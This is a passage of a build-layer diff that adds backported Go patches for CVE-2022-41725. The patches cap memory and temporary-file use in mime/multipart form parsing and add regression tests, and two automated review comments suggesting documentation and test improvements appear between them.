+- if !isHuff {
+- if wantStr {
+- s = string(p[:strLen])
+- }
+- return s, p[strLen:], nil
++ return u, p, errNeedMore
+ }
++ u.isHuff = isHuff
++ u.b = p[:strLen]
++ return u, p[strLen:], nil
++}
+
+- if wantStr {
+- buf := bufPool.Get().(*bytes.Buffer)
+- buf.Reset() // don't trust others
+- defer bufPool.Put(buf)
+- if err := huffmanDecode(buf, d.maxStrLen, p[:strLen]); err != nil {
+- buf.Reset()
+- return "", nil, err
+- }
++type undecodedString struct {
++ isHuff bool
++ b []byte
++}
++
++func (d *Decoder) decodeString(u undecodedString) (string, error) {
++ if !u.isHuff {
++ return string(u.b), nil
++ }
++ buf := bufPool.Get().(*bytes.Buffer)
++ buf.Reset() // don't trust others
++ var s string
++ err := huffmanDecode(buf, d.maxStrLen, u.b)
++ if err == nil {
+ s = buf.String()
+- buf.Reset() // be nice to GC
+ }
+- return s, p[strLen:], nil
++ buf.Reset() // be nice to GC
++ bufPool.Put(buf)
++ return s, err
+ }
+--
+2.7.4
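Review bot: `undecodedString` is added without a comment, and its `b` field aliases the slice passed to `readString` (`u.b = p[:strLen]`), so it is only valid until that buffer changes. `parseFieldLiteral` does decode both strings before `d.buf = buf`, but the constraint should be stated on the type: `// undecodedString is a still-encoded hpack string; b points into the caller's input buffer and must be decoded before that buffer is reused.` `decodeString` is also undocumented; `// decodeString returns u's contents, Huffman-decoding them when u.isHuff is set.` would be enough.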
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2022-41725-pre1.patch b/meta/recipes-devtools/go/go-1.14/CVE-2022-41725-pre1.patch
new file mode 100644
index 0000000000..37ebc41947
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2022-41725-pre1.patch
@@ -0,0 +1,85 @@
+From 874b3132a84cf76da6a48978826c04c380a37a50 Mon Sep 17 00:00:00 2001
+From: avivklas <avivklas@gmail.com>
+Date: Fri, 7 Aug 2020 21:50:12 +0300
+Subject: [PATCH] mime/multipart: return overflow errors in Reader.ReadForm
+
+Updates Reader.ReadForm to check for overflow errors that may
+result from a leeway addition of 10MiB to the input argument
+maxMemory.
+
+Fixes #40430
+
+Change-Id: I510b8966c95c51d04695ba9d08fcfe005fd11a5d
+Reviewed-on: https://go-review.googlesource.com/c/go/+/247477
+Run-TryBot: Emmanuel Odeke <emm.odeke@gmail.com>
+Trust: Cuong Manh Le <cuong.manhle.vn@gmail.com>
+Trust: Emmanuel Odeke <emm.odeke@gmail.com>
+TryBot-Result: Go Bot <gobot@golang.org>
+Reviewed-by: Emmanuel Odeke <emm.odeke@gmail.com>
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/874b3132a84cf76da6a48978826c04c380a37a50]
+CVE: CVE-2022-41725 #Dependency Patch1
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ src/mime/multipart/formdata.go | 4 ++++
+ src/mime/multipart/formdata_test.go | 18 ++++++++++++++++++
+ 2 files changed, 22 insertions(+)
+
+diff --git a/src/mime/multipart/formdata.go b/src/mime/multipart/formdata.go
+index 832d0ad693666..4eb31012941ac 100644
+--- a/src/mime/multipart/formdata.go
++++ b/src/mime/multipart/formdata.go
+@@ -7,6 +7,7 @@ package multipart
+ import (
+ "bytes"
+ "errors"
++ "fmt"
+ "io"
+ "io/ioutil"
+ "net/textproto"
+@@ -41,6 +42,9 @@ func (r *Reader) readForm(maxMemory int64) (_ *Form, err error) {
+
+ // Reserve an additional 10 MB for non-file parts.
+ maxValueBytes := maxMemory + int64(10<<20)
++ if maxValueBytes <= 0 {
++ return nil, fmt.Errorf("multipart: integer overflow from maxMemory(%d) + 10MiB for non-file parts", maxMemory)
++ }
+ for {
+ p, err := r.NextPart()
+ if err == io.EOF {
+diff --git a/src/mime/multipart/formdata_test.go b/src/mime/multipart/formdata_test.go
+index 7d756c8c244a0..7112e0d3727fe 100644
+--- a/src/mime/multipart/formdata_test.go
++++ b/src/mime/multipart/formdata_test.go
+@@ -7,6 +7,7 @@ package multipart
+ import (
+ "bytes"
+ "io"
++ "math"
+ "os"
+ "strings"
+ "testing"
+@@ -52,6 +53,23 @@ func TestReadFormWithNamelessFile(t *testing.T) {
+ }
+ }
+
++// Issue 40430: Ensure that we report integer overflows in additions of maxMemory,
++// instead of silently and subtly failing without indication.
++func TestReadFormMaxMemoryOverflow(t *testing.T) {
++ b := strings.NewReader(strings.ReplaceAll(messageWithTextContentType, "\n", "\r\n"))
++ r := NewReader(b, boundary)
++ f, err := r.ReadForm(math.MaxInt64)
++ if err == nil {
++ t.Fatal("Unexpected a non-nil error")
++ }
++ if f != nil {
++ t.Fatalf("Unexpected returned a non-nil form: %v\n", f)
++ }
++ if g, w := err.Error(), "integer overflow from maxMemory"; !strings.Contains(g, w) {
++ t.Errorf(`Error mismatch\n%q\ndid not contain\n%q`, g, w)
++ }
++}
++
+ func TestReadFormWithTextContentType(t *testing.T) {
+ // From https://github.com/golang/go/issues/24041
+ b := strings.NewReader(strings.ReplaceAll(messageWithTextContentType, "\n", "\r\n"))
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2022-41725-pre2.patch b/meta/recipes-devtools/go/go-1.14/CVE-2022-41725-pre2.patch
new file mode 100644
index 0000000000..b951ee893e
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2022-41725-pre2.patch
@@ -0,0 +1,97 @@
+From 4e5a313524da62600eb59dbf98624cfe946456f8 Mon Sep 17 00:00:00 2001
+From: Emmanuel T Odeke <emmanuel@orijtech.com>
+Date: Tue, 20 Oct 2020 04:11:12 -0700
+Subject: [PATCH] net/http: test that ParseMultipartForm catches overflows
+
+Tests that if the combination of:
+* HTTP multipart file payload size
+* ParseMultipartForm's maxMemory parameter
+* the internal leeway buffer size of 10MiB
+
+overflows, then we'll report an overflow instead of silently
+passing.
+
+Reapplies and fixes CL 254977, which was reverted in CL 263658.
+
+The prior test lacked a res.Body.Close(), so fixed that and
+added a leaked Transport check to verify correctness.
+
+Updates 40430.
+
+Change-Id: I3c0f7ef43d621f6eb00f07755f04f9f36c51f98f
+Reviewed-on: https://go-review.googlesource.com/c/go/+/263817
+Run-TryBot: Emmanuel Odeke <emm.odeke@gmail.com>
+TryBot-Result: Go Bot <gobot@golang.org>
+Reviewed-by: Bryan C. Mills <bcmills@google.com>
+Trust: Damien Neil <dneil@google.com>
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/4e5a313524da62600eb59dbf98624cfe946456f8]
+CVE: CVE-2022-41725 #Dependency Patch2
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ src/net/http/request_test.go | 45 ++++++++++++++++++++++++++++++++++++
+ 1 file changed, 45 insertions(+)
+
+diff --git a/src/net/http/request_test.go b/src/net/http/request_test.go
+index b4ef472e71229..19526b9ad791a 100644
+--- a/src/net/http/request_test.go
++++ b/src/net/http/request_test.go
+@@ -13,6 +13,7 @@ import (
+ "fmt"
+ "io"
+ "io/ioutil"
++ "math"
+ "mime/multipart"
+ . "net/http"
+ "net/http/httptest"
+@@ -245,6 +246,50 @@ func TestParseMultipartForm(t *testing.T) {
+ }
+ }
+
++// Issue #40430: Test that if maxMemory for ParseMultipartForm when combined with
++// the payload size and the internal leeway buffer size of 10MiB overflows, that we
++// correctly return an error.
++func TestMaxInt64ForMultipartFormMaxMemoryOverflow(t *testing.T) {
++ defer afterTest(t)
++
++ payloadSize := 1 << 10
++ cst := httptest.NewServer(HandlerFunc(func(rw ResponseWriter, req *Request) {
++ // The combination of:
++ // MaxInt64 + payloadSize + (internal spare of 10MiB)
++ // triggers the overflow. See issue https://golang.org/issue/40430/
++ if err := req.ParseMultipartForm(math.MaxInt64); err != nil {
++ Error(rw, err.Error(), StatusBadRequest)
++ return
++ }
++ }))
++ defer cst.Close()
++ fBuf := new(bytes.Buffer)
++ mw := multipart.NewWriter(fBuf)
++ mf, err := mw.CreateFormFile("file", "myfile.txt")
++ if err != nil {
++ t.Fatal(err)
++ }
++ if _, err := mf.Write(bytes.Repeat([]byte("abc"), payloadSize)); err != nil {
++ t.Fatal(err)
++ }
++ if err := mw.Close(); err != nil {
++ t.Fatal(err)
++ }
++ req, err := NewRequest("POST", cst.URL, fBuf)
++ if err != nil {
++ t.Fatal(err)
++ }
++ req.Header.Set("Content-Type", mw.FormDataContentType())
++ res, err := cst.Client().Do(req)
++ if err != nil {
++ t.Fatal(err)
++ }
++ res.Body.Close()
++ if g, w := res.StatusCode, StatusBadRequest; g != w {
++ t.Fatalf("Status code mismatch: got %d, want %d", g, w)
++ }
++}
++
+ func TestRedirect_h1(t *testing.T) { testRedirect(t, h1Mode) }
+ func TestRedirect_h2(t *testing.T) { testRedirect(t, h2Mode) }
+ func testRedirect(t *testing.T, h2 bool) {
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2022-41725-pre3.patch b/meta/recipes-devtools/go/go-1.14/CVE-2022-41725-pre3.patch
new file mode 100644
index 0000000000..767225b888
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2022-41725-pre3.patch
@@ -0,0 +1,98 @@
+From 5246fa5e75b129a7dbd9722aa4de0cbaf7ceae43 Mon Sep 17 00:00:00 2001
+From: Russ Cox <rsc@golang.org>
+Date: Thu, 3 Dec 2020 09:45:07 -0500
+Subject: [PATCH] mime/multipart: handle ReadForm(math.MaxInt64) better
+
+Returning an error about integer overflow is needlessly pedantic.
+The meaning of ReadForm(MaxInt64) is easily understood
+(accept a lot of data) and can be implemented.
+
+Fixes #40430.
+
+Change-Id: I8a522033dd9a2f9ad31dd2ad82cf08d553736ab9
+Reviewed-on: https://go-review.googlesource.com/c/go/+/275112
+Trust: Russ Cox <rsc@golang.org>
+Run-TryBot: Russ Cox <rsc@golang.org>
+TryBot-Result: Go Bot <gobot@golang.org>
+Reviewed-by: Ian Lance Taylor <iant@golang.org>
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/5246fa5e75b129a7dbd9722aa4de0cbaf7ceae43]
+CVE: CVE-2022-41725 #Dependency Patch3
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ src/mime/multipart/formdata.go | 8 ++++++--
+ src/mime/multipart/formdata_test.go | 14 +++++---------
+ src/net/http/request_test.go | 2 +-
+ 3 files changed, 12 insertions(+), 12 deletions(-)
+
+diff --git a/src/mime/multipart/formdata.go b/src/mime/multipart/formdata.go
+index 4eb31012941ac..9c42ea8c023b5 100644
+--- a/src/mime/multipart/formdata.go
++++ b/src/mime/multipart/formdata.go
+@@ -7,9 +7,9 @@ package multipart
+ import (
+ "bytes"
+ "errors"
+- "fmt"
+ "io"
+ "io/ioutil"
++ "math"
+ "net/textproto"
+ "os"
+ )
+@@ -43,7 +43,11 @@ func (r *Reader) readForm(maxMemory int64) (_ *Form, err error) {
+ // Reserve an additional 10 MB for non-file parts.
+ maxValueBytes := maxMemory + int64(10<<20)
+ if maxValueBytes <= 0 {
+- return nil, fmt.Errorf("multipart: integer overflow from maxMemory(%d) + 10MiB for non-file parts", maxMemory)
++ if maxMemory < 0 {
++ maxValueBytes = 0
++ } else {
++ maxValueBytes = math.MaxInt64
++ }
+ }
+ for {
+ p, err := r.NextPart()
+diff --git a/src/mime/multipart/formdata_test.go b/src/mime/multipart/formdata_test.go
+index 7112e0d3727fe..e3a3a3eae8e15 100644
+--- a/src/mime/multipart/formdata_test.go
++++ b/src/mime/multipart/formdata_test.go
+@@ -53,20 +53,16 @@ func TestReadFormWithNamelessFile(t *testing.T) {
+ }
+ }
+
+-// Issue 40430: Ensure that we report integer overflows in additions of maxMemory,
+-// instead of silently and subtly failing without indication.
++// Issue 40430: Handle ReadForm(math.MaxInt64)
+ func TestReadFormMaxMemoryOverflow(t *testing.T) {
+ b := strings.NewReader(strings.ReplaceAll(messageWithTextContentType, "\n", "\r\n"))
+ r := NewReader(b, boundary)
+ f, err := r.ReadForm(math.MaxInt64)
+- if err == nil {
+- t.Fatal("Unexpected a non-nil error")
+- }
+- if f != nil {
+- t.Fatalf("Unexpected returned a non-nil form: %v\n", f)
++ if err != nil {
++ t.Fatalf("ReadForm(MaxInt64): %v", err)
+ }
+- if g, w := err.Error(), "integer overflow from maxMemory"; !strings.Contains(g, w) {
+- t.Errorf(`Error mismatch\n%q\ndid not contain\n%q`, g, w)
++ if f == nil {
++ t.Fatal("ReadForm(MaxInt64): missing form")
+ }
+ }
+
+diff --git a/src/net/http/request_test.go b/src/net/http/request_test.go
+index 19526b9ad791a..689498e19d5dd 100644
+--- a/src/net/http/request_test.go
++++ b/src/net/http/request_test.go
+@@ -285,7 +285,7 @@ func TestMaxInt64ForMultipartFormMaxMemoryOverflow(t *testing.T) {
+ t.Fatal(err)
+ }
+ res.Body.Close()
+- if g, w := res.StatusCode, StatusBadRequest; g != w {
++ if g, w := res.StatusCode, StatusOK; g != w {
+ t.Fatalf("Status code mismatch: got %d, want %d", g, w)
+ }
+ }
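Review bot: The rewritten TestReadFormMaxMemoryOverflow in src/mime/multipart/formdata_test.go passes as soon as ReadForm(math.MaxInt64) returns a nil error and a non-nil form, so it never checks that the parsed values survived the new clamp `maxValueBytes = math.MaxInt64` in readForm. That matters because the read calls further down readForm, outside this hunk, appear to pass the limit plus one to io.CopyN, which leaves no headroom at MaxInt64; a wrapped limit would probably show up as empty values rather than as an error. I would add a value comparison after the `f == nil` check, in the style of the large-text test in the same file: `if g := f.Value[FIELD][0]; g != WANT { t.Errorf("ReadForm(MaxInt64): value = %q, want %q", g, WANT) }`, where FIELD and WANT are placeholders for a field of the messageWithTextContentType fixture. The request_test.go change has the same gap, since it compares only the status code against `StatusOK`.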
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2022-41725.patch b/meta/recipes-devtools/go/go-1.14/CVE-2022-41725.patch
new file mode 100644
index 0000000000..5f80c62b0b
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2022-41725.patch
@@ -0,0 +1,660 @@
+From 5c55ac9bf1e5f779220294c843526536605f42ab Mon Sep 17 00:00:00 2001
+From: Damien Neil <dneil@google.com>
+Date: Wed, 25 Jan 2023 09:27:01 -0800
+Subject: [PATCH] [release-branch.go1.19] mime/multipart: limit memory/inode consumption of ReadForm
+
+Reader.ReadForm is documented as storing "up to maxMemory bytes + 10MB"
+in memory. Parsed forms can consume substantially more memory than
+this limit, since ReadForm does not account for map entry overhead
+and MIME headers.
+
+In addition, while the amount of disk memory consumed by ReadForm can
+be constrained by limiting the size of the parsed input, ReadForm will
+create one temporary file per form part stored on disk, potentially
+consuming a large number of inodes.
+
+Update ReadForm's memory accounting to include part names,
+MIME headers, and map entry overhead.
+
+Update ReadForm to store all on-disk file parts in a single
+temporary file.
+
+Files returned by FileHeader.Open are documented as having a concrete
+type of *os.File when a file is stored on disk. The change to use a
+single temporary file for all parts means that this is no longer the
+case when a form contains more than a single file part stored on disk.
+
+The previous behavior of storing each file part in a separate disk
+file may be reenabled with GODEBUG=multipartfiles=distinct.
+
+Update Reader.NextPart and Reader.NextRawPart to set a 10MiB cap
+on the size of MIME headers.
+
+Thanks to Jakob Ackermann (@das7pad) for reporting this issue.
+
+Updates #58006
+Fixes #58362
+Fixes CVE-2022-41725
+
+Change-Id: Ibd780a6c4c83ac8bcfd3cbe344f042e9940f2eab
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1714276
+Reviewed-by: Julie Qiu <julieqiu@google.com>
+TryBot-Result: Security TryBots <security-trybots@go-security-trybots.iam.gserviceaccount.com>
+Reviewed-by: Roland Shoemaker <bracewell@google.com>
+Run-TryBot: Damien Neil <dneil@google.com>
+(cherry picked from commit ed4664330edcd91b24914c9371c377c132dbce8c)
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1728949
+Reviewed-by: Tatiana Bradley <tatianabradley@google.com>
+Run-TryBot: Roland Shoemaker <bracewell@google.com>
+Reviewed-by: Damien Neil <dneil@google.com>
+Reviewed-on: https://go-review.googlesource.com/c/go/+/468116
+TryBot-Result: Gopher Robot <gobot@golang.org>
+Reviewed-by: Than McIntosh <thanm@google.com>
+Run-TryBot: Michael Pratt <mpratt@google.com>
+Auto-Submit: Michael Pratt <mpratt@google.com>
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/5c55ac9bf1e5f779220294c843526536605f42ab]
+CVE: CVE-2022-41725
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ src/mime/multipart/formdata.go | 132 ++++++++++++++++++++-----
+ src/mime/multipart/formdata_test.go | 140 ++++++++++++++++++++++++++-
+ src/mime/multipart/multipart.go | 25 +++--
+ src/mime/multipart/readmimeheader.go | 14 +++
+ src/net/http/request_test.go | 2 +-
+ src/net/textproto/reader.go | 27 ++++++
+ 6 files changed, 303 insertions(+), 37 deletions(-)
+ create mode 100644 src/mime/multipart/readmimeheader.go
+
+diff --git a/src/mime/multipart/formdata.go b/src/mime/multipart/formdata.go
+index 9c42ea8..1eeb340 100644
+--- a/src/mime/multipart/formdata.go
++++ b/src/mime/multipart/formdata.go
+@@ -7,6 +7,7 @@ package multipart
+ import (
+ "bytes"
+ "errors"
++ "internal/godebug"
+ "io"
+ "io/ioutil"
+ "math"
+@@ -34,23 +35,58 @@ func (r *Reader) ReadForm(maxMemory int64) (*Form, error) {
+
+ func (r *Reader) readForm(maxMemory int64) (_ *Form, err error) {
+ form := &Form{make(map[string][]string), make(map[string][]*FileHeader)}
++ var (
++ file *os.File
++ fileOff int64
++ )
++ numDiskFiles := 0
++ multipartFiles := godebug.Get("multipartfiles")
++ combineFiles := multipartFiles != "distinct"
+ defer func() {
++ if file != nil {
++ if cerr := file.Close(); err == nil {
++ err = cerr
++ }
++ }
++ if combineFiles && numDiskFiles > 1 {
++ for _, fhs := range form.File {
++ for _, fh := range fhs {
++ fh.tmpshared = true
++ }
++ }
++ }
+ if err != nil {
+ form.RemoveAll()
++ if file != nil {
++ os.Remove(file.Name())
++ }
+ }
+ }()
+
+- // Reserve an additional 10 MB for non-file parts.
+- maxValueBytes := maxMemory + int64(10<<20)
+- if maxValueBytes <= 0 {
++ // maxFileMemoryBytes is the maximum bytes of file data we will store in memory.
++ // Data past this limit is written to disk.
++ // This limit strictly applies to content, not metadata (filenames, MIME headers, etc.),
++ // since metadata is always stored in memory, not disk.
++ //
++ // maxMemoryBytes is the maximum bytes we will store in memory, including file content,
++ // non-file part values, metdata, and map entry overhead.
++ //
++ // We reserve an additional 10 MB in maxMemoryBytes for non-file data.
++ //
++ // The relationship between these parameters, as well as the overly-large and
++ // unconfigurable 10 MB added on to maxMemory, is unfortunate but difficult to change
++ // within the constraints of the API as documented.
++ maxFileMemoryBytes := maxMemory
++ maxMemoryBytes := maxMemory + int64(10<<20)
++ if maxMemoryBytes <= 0 {
+ if maxMemory < 0 {
+- maxValueBytes = 0
++ maxMemoryBytes = 0
+ } else {
+- maxValueBytes = math.MaxInt64
++ maxMemoryBytes = math.MaxInt64
+ }
+ }
+ for {
+- p, err := r.NextPart()
++ p, err := r.nextPart(false, maxMemoryBytes)
+ if err == io.EOF {
+ break
+ }
+@@ -64,16 +100,27 @@ func (r *Reader) readForm(maxMemory int64) (_ *Form, err error) {
+ }
+ filename := p.FileName()
+
++ // Multiple values for the same key (one map entry, longer slice) are cheaper
++ // than the same number of values for different keys (many map entries), but
++ // using a consistent per-value cost for overhead is simpler.
++ maxMemoryBytes -= int64(len(name))
++ maxMemoryBytes -= 100 // map overhead
++ if maxMemoryBytes < 0 {
++ // We can't actually take this path, since nextPart would already have
++ // rejected the MIME headers for being too large. Check anyway.
++ return nil, ErrMessageTooLarge
++ }
++
+ var b bytes.Buffer
+
+ if filename == "" {
+ // value, store as string in memory
+- n, err := io.CopyN(&b, p, maxValueBytes+1)
++ n, err := io.CopyN(&b, p, maxMemoryBytes+1)
+ if err != nil && err != io.EOF {
+ return nil, err
+ }
+- maxValueBytes -= n
+- if maxValueBytes < 0 {
++ maxMemoryBytes -= n
++ if maxMemoryBytes < 0 {
+ return nil, ErrMessageTooLarge
+ }
+ form.Value[name] = append(form.Value[name], b.String())
+@@ -81,35 +128,45 @@ func (r *Reader) readForm(maxMemory int64) (_ *Form, err error) {
+ }
+
+ // file, store in memory or on disk
++ maxMemoryBytes -= mimeHeaderSize(p.Header)
++ if maxMemoryBytes < 0 {
++ return nil, ErrMessageTooLarge
++ }
+ fh := &FileHeader{
+ Filename: filename,
+ Header: p.Header,
+ }
+- n, err := io.CopyN(&b, p, maxMemory+1)
++ n, err := io.CopyN(&b, p, maxFileMemoryBytes+1)
+ if err != nil && err != io.EOF {
+ return nil, err
+ }
+- if n > maxMemory {
+- // too big, write to disk and flush buffer
+- file, err := ioutil.TempFile("", "multipart-")
+- if err != nil {
+- return nil, err
++ if n > maxFileMemoryBytes {
++ if file == nil {
++ file, err = ioutil.TempFile(r.tempDir, "multipart-")
++ if err != nil {
++ return nil, err
++ }
+ }
++ numDiskFiles++
+ size, err := io.Copy(file, io.MultiReader(&b, p))
+- if cerr := file.Close(); err == nil {
+- err = cerr
+- }
+ if err != nil {
+- os.Remove(file.Name())
+ return nil, err
+ }
+ fh.tmpfile = file.Name()
+ fh.Size = size
++ fh.tmpoff = fileOff
++ fileOff += size
++ if !combineFiles {
++ if err := file.Close(); err != nil {
++ return nil, err
++ }
++ file = nil
++ }
+ } else {
+ fh.content = b.Bytes()
+ fh.Size = int64(len(fh.content))
+- maxMemory -= n
+- maxValueBytes -= n
++ maxFileMemoryBytes -= n
++ maxMemoryBytes -= n
+ }
+ form.File[name] = append(form.File[name], fh)
+ }
+@@ -117,6 +174,17 @@ func (r *Reader) readForm(maxMemory int64) (_ *Form, err error) {
+ return form, nil
+ }
+
++func mimeHeaderSize(h textproto.MIMEHeader) (size int64) {
++ for k, vs := range h {
++ size += int64(len(k))
++ size += 100 // map entry overhead
++ for _, v := range vs {
++ size += int64(len(v))
++ }
++ }
++ return size
++}
++
+ // Form is a parsed multipart form.
+ // Its File parts are stored either in memory or on disk,
+ // and are accessible via the *FileHeader's Open method.
+@@ -134,7 +202,7 @@ func (f *Form) RemoveAll() error {
+ for _, fh := range fhs {
+ if fh.tmpfile != "" {
+ e := os.Remove(fh.tmpfile)
+- if e != nil && err == nil {
++ if e != nil && !errors.Is(e, os.ErrNotExist) && err == nil {
+ err = e
+ }
+ }
+@@ -149,15 +217,25 @@ type FileHeader struct {
+ Header textproto.MIMEHeader
+ Size int64
+
+- content []byte
+- tmpfile string
++ content []byte
++ tmpfile string
++ tmpoff int64
++ tmpshared bool
+ }
+
+ // Open opens and returns the FileHeader's associated File.
+ func (fh *FileHeader) Open() (File, error) {
+ if b := fh.content; b != nil {
+ r := io.NewSectionReader(bytes.NewReader(b), 0, int64(len(b)))
+- return sectionReadCloser{r}, nil
++ return sectionReadCloser{r, nil}, nil
++ }
++ if fh.tmpshared {
++ f, err := os.Open(fh.tmpfile)
++ if err != nil {
++ return nil, err
++ }
++ r := io.NewSectionReader(f, fh.tmpoff, fh.Size)
++ return sectionReadCloser{r, f}, nil
+ }
+ return os.Open(fh.tmpfile)
+ }
+@@ -176,8 +254,12 @@ type File interface {
+
+ type sectionReadCloser struct {
+ *io.SectionReader
++ io.Closer
+ }
+
+ func (rc sectionReadCloser) Close() error {
++ if rc.Closer != nil {
++ return rc.Closer.Close()
++ }
+ return nil
+ }
+diff --git a/src/mime/multipart/formdata_test.go b/src/mime/multipart/formdata_test.go
+index e3a3a3e..5cded71 100644
+--- a/src/mime/multipart/formdata_test.go
++++ b/src/mime/multipart/formdata_test.go
+@@ -6,8 +6,10 @@ package multipart
+
+ import (
+ "bytes"
++ "fmt"
+ "io"
+ "math"
++ "net/textproto"
+ "os"
+ "strings"
+ "testing"
+@@ -208,8 +210,8 @@ Content-Disposition: form-data; name="largetext"
+ maxMemory int64
+ err error
+ }{
+- {"smaller", 50, nil},
+- {"exact-fit", 25, nil},
++ {"smaller", 50 + int64(len("largetext")) + 100, nil},
++ {"exact-fit", 25 + int64(len("largetext")) + 100, nil},
+ {"too-large", 0, ErrMessageTooLarge},
+ }
+ for _, tc := range testCases {
+@@ -224,7 +226,7 @@ Content-Disposition: form-data; name="largetext"
+ defer f.RemoveAll()
+ }
+ if tc.err != err {
+- t.Fatalf("ReadForm error - got: %v; expected: %v", tc.err, err)
++ t.Fatalf("ReadForm error - got: %v; expected: %v", err, tc.err)
+ }
+ if err == nil {
+ if g := f.Value["largetext"][0]; g != largeTextValue {
+@@ -234,3 +236,135 @@ Content-Disposition: form-data; name="largetext"
+ })
+ }
+ }
++
++// TestReadForm_MetadataTooLarge verifies that we account for the size of field names,
++// MIME headers, and map entry overhead while limiting the memory consumption of parsed forms.
++func TestReadForm_MetadataTooLarge(t *testing.T) {
++ for _, test := range []struct {
++ name string
++ f func(*Writer)
++ }{{
++ name: "large name",
++ f: func(fw *Writer) {
++ name := strings.Repeat("a", 10<<20)
++ w, _ := fw.CreateFormField(name)
++ w.Write([]byte("value"))
++ },
++ }, {
++ name: "large MIME header",
++ f: func(fw *Writer) {
++ h := make(textproto.MIMEHeader)
++ h.Set("Content-Disposition", `form-data; name="a"`)
++ h.Set("X-Foo", strings.Repeat("a", 10<<20))
++ w, _ := fw.CreatePart(h)
++ w.Write([]byte("value"))
++ },
++ }, {
++ name: "many parts",
++ f: func(fw *Writer) {
++ for i := 0; i < 110000; i++ {
++ w, _ := fw.CreateFormField("f")
++ w.Write([]byte("v"))
++ }
++ },
++ }} {
++ t.Run(test.name, func(t *testing.T) {
++ var buf bytes.Buffer
++ fw := NewWriter(&buf)
++ test.f(fw)
++ if err := fw.Close(); err != nil {
++ t.Fatal(err)
++ }
++ fr := NewReader(&buf, fw.Boundary())
++ _, err := fr.ReadForm(0)
++ if err != ErrMessageTooLarge {
++ t.Errorf("fr.ReadForm() = %v, want ErrMessageTooLarge", err)
++ }
++ })
++ }
++}
++
++// TestReadForm_ManyFiles_Combined tests that a multipart form containing many files only
++// results in a single on-disk file.
++func TestReadForm_ManyFiles_Combined(t *testing.T) {
++ const distinct = false
++ testReadFormManyFiles(t, distinct)
++}
++
++// TestReadForm_ManyFiles_Distinct tests that setting GODEBUG=multipartfiles=distinct
++// results in every file in a multipart form being placed in a distinct on-disk file.
++func TestReadForm_ManyFiles_Distinct(t *testing.T) {
++ t.Setenv("GODEBUG", "multipartfiles=distinct")
++ const distinct = true
++ testReadFormManyFiles(t, distinct)
++}
++
++func testReadFormManyFiles(t *testing.T, distinct bool) {
++ var buf bytes.Buffer
++ fw := NewWriter(&buf)
++ const numFiles = 10
++ for i := 0; i < numFiles; i++ {
++ name := fmt.Sprint(i)
++ w, err := fw.CreateFormFile(name, name)
++ if err != nil {
++ t.Fatal(err)
++ }
++ w.Write([]byte(name))
++ }
++ if err := fw.Close(); err != nil {
++ t.Fatal(err)
++ }
++ fr := NewReader(&buf, fw.Boundary())
++ fr.tempDir = t.TempDir()
++ form, err := fr.ReadForm(0)
++ if err != nil {
++ t.Fatal(err)
++ }
++ for i := 0; i < numFiles; i++ {
++ name := fmt.Sprint(i)
++ if got := len(form.File[name]); got != 1 {
++ t.Fatalf("form.File[%q] has %v entries, want 1", name, got)
++ }
++ fh := form.File[name][0]
++ file, err := fh.Open()
++ if err != nil {
++ t.Fatalf("form.File[%q].Open() = %v", name, err)
++ }
++ if distinct {
++ if _, ok := file.(*os.File); !ok {
++ t.Fatalf("form.File[%q].Open: %T, want *os.File", name, file)
++ }
++ }
++ got, err := io.ReadAll(file)
++ file.Close()
++ if string(got) != name || err != nil {
++ t.Fatalf("read form.File[%q]: %q, %v; want %q, nil", name, string(got), err, name)
++ }
++ }
++ dir, err := os.Open(fr.tempDir)
++ if err != nil {
++ t.Fatal(err)
++ }
++ defer dir.Close()
++ names, err := dir.Readdirnames(0)
++ if err != nil {
++ t.Fatal(err)
++ }
++ wantNames := 1
++ if distinct {
++ wantNames = numFiles
++ }
++ if len(names) != wantNames {
++ t.Fatalf("temp dir contains %v files; want 1", len(names))
++ }
++ if err := form.RemoveAll(); err != nil {
++ t.Fatalf("form.RemoveAll() = %v", err)
++ }
++ names, err = dir.Readdirnames(0)
++ if err != nil {
++ t.Fatal(err)
++ }
++ if len(names) != 0 {
++ t.Fatalf("temp dir contains %v files; want 0", len(names))
++ }
++}
+diff --git a/src/mime/multipart/multipart.go b/src/mime/multipart/multipart.go
+index 1750300..958cef8 100644
+--- a/src/mime/multipart/multipart.go
++++ b/src/mime/multipart/multipart.go
+@@ -121,12 +121,12 @@ func (r *stickyErrorReader) Read(p []byte) (n int, _ error) {
+ return n, r.err
+ }
+
+-func newPart(mr *Reader, rawPart bool) (*Part, error) {
++func newPart(mr *Reader, rawPart bool, maxMIMEHeaderSize int64) (*Part, error) {
+ bp := &Part{
+ Header: make(map[string][]string),
+ mr: mr,
+ }
+- if err := bp.populateHeaders(); err != nil {
++ if err := bp.populateHeaders(maxMIMEHeaderSize); err != nil {
+ return nil, err
+ }
+ bp.r = partReader{bp}
+@@ -142,12 +142,16 @@ func newPart(mr *Reader, rawPart bool) (*Part, error) {
+ return bp, nil
+ }
+
+-func (bp *Part) populateHeaders() error {
++func (bp *Part) populateHeaders(maxMIMEHeaderSize int64) error {
+ r := textproto.NewReader(bp.mr.bufReader)
+- header, err := r.ReadMIMEHeader()
++ header, err := readMIMEHeader(r, maxMIMEHeaderSize)
+ if err == nil {
+ bp.Header = header
+ }
++ // TODO: Add a distinguishable error to net/textproto.
++ if err != nil && err.Error() == "message too large" {
++ err = ErrMessageTooLarge
++ }
+ return err
+ }
+
+@@ -287,6 +291,7 @@ func (p *Part) Close() error {
+ // isn't supported.
+ type Reader struct {
+ bufReader *bufio.Reader
++ tempDir string // used in tests
+
+ currentPart *Part
+ partsRead int
